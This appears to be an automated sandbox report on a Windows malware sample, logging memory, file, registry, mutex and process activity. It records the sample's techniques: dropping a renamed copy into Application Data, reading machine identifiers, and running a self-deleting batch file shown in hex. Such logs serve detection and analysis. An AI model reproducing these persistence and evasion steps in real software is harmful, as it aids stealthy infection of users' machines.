C:\WINDOWS\WindowsShell.Manifest query and read commit 3E0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 3E0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 2E20000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 2ED0000 8462336 own pid readonly success or wait 1
\KnownDlls\WS2_32.dll write and read and execute unknown 2ED0000 8462336 own pid readonly object name not found 1
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown 77B20000 73728 own pid read write success or wait 1
\KnownDlls\WININET.dll write and read and execute unknown 771B0000 696320 own pid read write success or wait 1
C:\WINDOWS\system32\wininet.dll read commit 7FF0000 667648 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe query and write and read and execute and extend size image 7FF0000 667648 own pid readonly success or wait 1
C:\WINDOWS\system32\apphelp.dll write and read and execute commit 2E60000 126976 own pid execute success or wait 1
C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 8070000 1208320 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe query and read commit 2E60000 258048 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and write and read and execute and extend size image 2E60000 258048 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 8070000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit 81A0000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 81A0000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit 81A0000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 81A0000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 8070000 389120 own pid readonly success or wait 1
Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir ComputerName success or wait 1 41A95F
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft InstallDate success or wait 1 405EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft DigitalProductId buffer overflow 2 405F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft DigitalProductId success or wait 1 405F7A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\{64307AAF-C4D3-D5D5-FB56-FD56EA1DDE44} success or wait 1 41A811
Process Activities:
+ Process started
PID Filepath Cmdline Flags Completion Count Source Address
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 0 success or wait 1 428A8D
2152 C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat 0 success or wait 1 428A8D
+ Process terminated
PID Filepath Completion Count Source Address
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe success or wait 1 41B403
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe success or wait 0 41B403
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 7C811195 1 8B success or wait 1 41B1A4
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2E40000 13FF9C page execute and read and write success or wait 1 4E4097
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2ED0000 13FCA4 page execute and read and write success or wait 1 2E40307
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 7FF0000 13F8E0 page read and write success or wait 1 41A5EB
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 7FF0000 13F8E4 page read and write success or wait 1 41A5EB
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2E60000 13F49C page read and write success or wait 1 411C3E
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2E60000 13ED10 page read and write success or wait 1 411C3E
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 400000 1000 page read and write page readonly success or wait 1 287F737
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 400000 1000 page readonly page read and write success or wait 1 287F74C
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 40050A 2446000 page execute and read and write page readonly success or wait 1 4E404E
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 412CC7 1000 page execute and read and write page execute and read and write success or wait 2 41E7C5
Token Activities:
+ Token privilege adjusted
Status Privilege Completion Count Source Address
on Security success or wait 1 428925
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2573155734
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2573436053
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2573477701
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2573490013
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2573491214
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2573491988
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2573560856
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2573561250
Section loaded Path: \KnownDlls\compstui.dll Access: write and read and execute Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2573593423
Section loaded Path: C:\WINDOWS\system32\compstui.dll Access: query and write and read and execute Type: image Baseaddress: 6E680000 Size: 241664 Protection: read write Mapped to pid: own pid success or wait 2573670200
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2573747823
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2573815420
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2573822572
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2573835087
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2573839782
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2573846385
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 2573855418
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2573857125
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2573916304
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2573944926
Section loaded Path: \KnownDlls\ddraw.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid object name not found 2574094640
Section loaded Path: C:\WINDOWS\system32\ddraw.dll Access: query and write and read and execute Type: image Baseaddress: 73760000 Size: 307200 Protection: read write Mapped to pid: own pid success or wait 2574096779
Section loaded Path: \KnownDlls\DCIMAN32.dll Access: write and read and execute Type: unknown Baseaddress: 73760000 Size: 307200 Protection: read write Mapped to pid: own pid object name not found 2574102489
Section loaded Path: C:\WINDOWS\system32\dciman32.dll Access: query and write and read and execute Type: image Baseaddress: 73BC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2574105429
Section loaded Path: \KnownDlls\resutils.dll Access: write and read and execute Type: unknown Baseaddress: 73BC0000 Size: 24576 Protection: read write Mapped to pid: own pid object name not found 2574122690
Section loaded Path: C:\WINDOWS\system32\resutils.dll Access: query and write and read and execute Type: image Baseaddress: 750B0000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2574125526
Section loaded Path: \KnownDlls\CLUSAPI.dll Access: write and read and execute Type: unknown Baseaddress: 750B0000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 2574137835
Section loaded Path: C:\WINDOWS\system32\clusapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D10000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2574147522
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2574773497
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2574784927
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2574797891
Section loaded Path: \KnownDlls\scarddlg.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2574805818
Section loaded Path: C:\WINDOWS\system32\scarddlg.dll Access: query and write and read and execute Type: image Baseaddress: 5CFE0000 Size: 90112 Protection: read write Mapped to pid: own pid success or wait 2574813091
Section loaded Path: \KnownDlls\MFC42u.DLL Access: write and read and execute Type: unknown Baseaddress: 5CFE0000 Size: 90112 Protection: read write Mapped to pid: own pid object name not found 2575329961
Section loaded Path: C:\WINDOWS\system32\mfc42u.dll Access: query and write and read and execute Type: image Baseaddress: 72830000 Size: 991232 Protection: read write Mapped to pid: own pid success or wait 2575333197
Section loaded Path: \KnownDlls\WinSCard.dll Access: write and read and execute Type: unknown Baseaddress: 72830000 Size: 991232 Protection: read write Mapped to pid: own pid object name not found 2575796400
Section loaded Path: C:\WINDOWS\system32\winscard.dll Access: query and write and read and execute Type: image Baseaddress: 723D0000 Size: 114688 Protection: read write Mapped to pid: own pid success or wait 2575798716
Section loaded Path: \KnownDlls\WTSAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 723D0000 Size: 114688 Protection: read write Mapped to pid: own pid object name not found 2575812961
Section loaded Path: C:\WINDOWS\system32\wtsapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76F50000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2575816085
Section loaded Path: \KnownDlls\WINSTA.dll Access: write and read and execute Type: unknown Baseaddress: 76F50000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2575955111
Section loaded Path: C:\WINDOWS\system32\winsta.dll Access: query and write and read and execute Type: image Baseaddress: 76360000 Size: 65536 Protection: read write Mapped to pid: own pid success or wait 2575957032
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2576165316
Section loaded Path: \KnownDlls\COMCTL32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2576194206
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid object name not found 2576209722
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2576219169
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 28C0000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2576227212
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 475136 Protection: execute Mapped to pid: own pid success or wait 2576247867
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 475136 Protection: execute Mapped to pid: own pid success or wait 2576252487
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: query and write and read and execute Type: image Baseaddress: 71590000 Size: 495616 Protection: read write Mapped to pid: own pid success or wait 2576257238
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2576286481
Section loaded Path: \KnownDlls\WINSPOOL.DRV Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid object name not found 2576314527
Section loaded Path: C:\WINDOWS\system32\winspool.drv Access: query and write and read and execute Type: image Baseaddress: 73000000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2576316277
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 360000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2576353860
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3B0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2576641307
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3B0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2576653161
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2576655478
Section loaded Path: C:\WINDOWS\system32\compstui.dll Access: read Type: commit Baseaddress: 2DA0000 Size: 229376 Protection: readonly Mapped to pid: own pid success or wait 2576783674
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 2DA0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2577059255
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2577062608
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3E0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2577255971
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2577310538
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2577564719
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 2E20000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2578782058
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 2ED0000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2578870279
Memory attributes changed PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 400000 Length: 1000 New Protection: page read and write New Protection: page readonly success or wait 2593479358
Memory attributes changed PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 400000 Length: 1000 New Protection: page readonly New Protection: page read and write success or wait 2593481097
Memory attributes changed PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 40050A Length: 2446000 New Protection: page execute and read and write New Protection: page readonly success or wait 2593486565
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2E40000 Length: 13FF9C Allocation Type: null Protection: page execute and read and write success or wait 2593555385
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2ED0000 Length: 13FCA4 Allocation Type: null Protection: page execute and read and write success or wait 2593562073
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 2ED0000 Size: 8462336 Protection: readonly Mapped to pid: own pid object name not found 2593621661
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2593651075
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2593659013
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2593660680
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2595931677
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2595939344
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 771B0000 Size: 696320 Protection: read write Mapped to pid: own pid success or wait 2595982254
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: read Type: commit Baseaddress: 7FF0000 Size: 667648 Protection: readonly Mapped to pid: own pid success or wait 2596075967
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 7FF0000 Length: 13F8E0 Allocation Type: null Protection: page read and write success or wait 2596272835
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 7FF0000 Length: 13F8E4 Allocation Type: null Protection: page read and write success or wait 2596273149
File opened Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2596414660
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2E60000 Length: 13F49C Allocation Type: null Protection: page read and write success or wait 2596415573
File read Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Offset: none Length: 257536 Value: 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 success or wait 2596415846
Mutant created Name: \BaseNamedObjects\Global\{64307AAF-C4D3-D5D5-FB56-FD56EA1DDE44} success or wait 2597174747
Memory read PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 7C811195 Length: 1 Value: 8B success or wait 2597183029
Memory attributes changed PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 412CC7 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2597183619
Memory attributes changed PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 412CC7 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2597184713
File created Path: C:\Documents and Settings\Administrator\Application Data\Avliy Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false success or wait 2597186309
File created Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2597248598
File created Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false success or wait 2597251385
Privilege adjusted Privilege: Security On or off: on success or wait 2597263457
File created Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2597273341
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: ComputerName success or wait 2597307614
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: InstallDate success or wait 2597308153
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: DigitalProductId buffer overflow 2597308731
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: DigitalProductId buffer overflow 2597313961
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: DigitalProductId success or wait 2597314468
File opened Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2597348351
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2E60000 Length: 13ED10 Allocation Type: null Protection: page read and write success or wait 2597349253
File read Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Offset: none Length: 257536 Value: 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 success or wait 2597349545
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe success or wait 2598354771
File deleted Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe success or wait 2598355587
File created Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2598356068
File write Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Offset: none Length: 257536 Value: 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 success or wait 2598491216
File opened Path: C:\Documents and Settings\Administrator\Application Data Access: read attributes and synchronize and generic read Options: synchronous io non alert and open for backup ident Attributes: none Content Overwritten: false success or wait 2598503042
File opened Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2598504137
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe success or wait 2598504690
File opened Path: C:\Documents and Settings\Administrator\Application Data\Avliy Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false file is a directory 2598505275
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2598516126
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false file is a directory 2598546806
Section loaded Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 7FF0000 Size: 667648 Protection: readonly Mapped to pid: own pid success or wait 2598626676
Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 2E60000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2598746733
Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 2598773450
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8070000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2598780552
Section loaded Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Access: query and read Type: commit Baseaddress: 2E60000 Size: 258048 Protection: readonly Mapped to pid: own pid success or wait 2599028868
Process created PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Cmdline: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Createflags: 0 success or wait 2599034249
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2667129021
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: true success or wait 2667195192
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Offset: none Length: 244 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 success or wait 2667199320
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 2E60000 Size: 258048 Protection: readonly Mapped to pid: own pid success or wait 2667207391
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8070000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2667210847
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: 81A0000 Size: 389120 Protection: execute Mapped to pid: own pid success or wait 2667271179
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: 81A0000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2667282721
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: 81A0000 Size: 389120 Protection: execute Mapped to pid: own pid success or wait 2667292319
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: 81A0000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2667301866
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: 8070000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2667312172
Process created PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Cmdline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Createflags: 0 success or wait 2667319224
Process terminated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe success or wait 2787134060
Analysis File: regsvr32.exe PID: 652 Parent PID: 1712
+ Sections
+ General
Start time: 05:44:26
Start date: 08/12/2011
Path: C:\WINDOWS\system32\regsvr32.exe
Commandline: regsvr32 -s 0.7663042396006076.exe
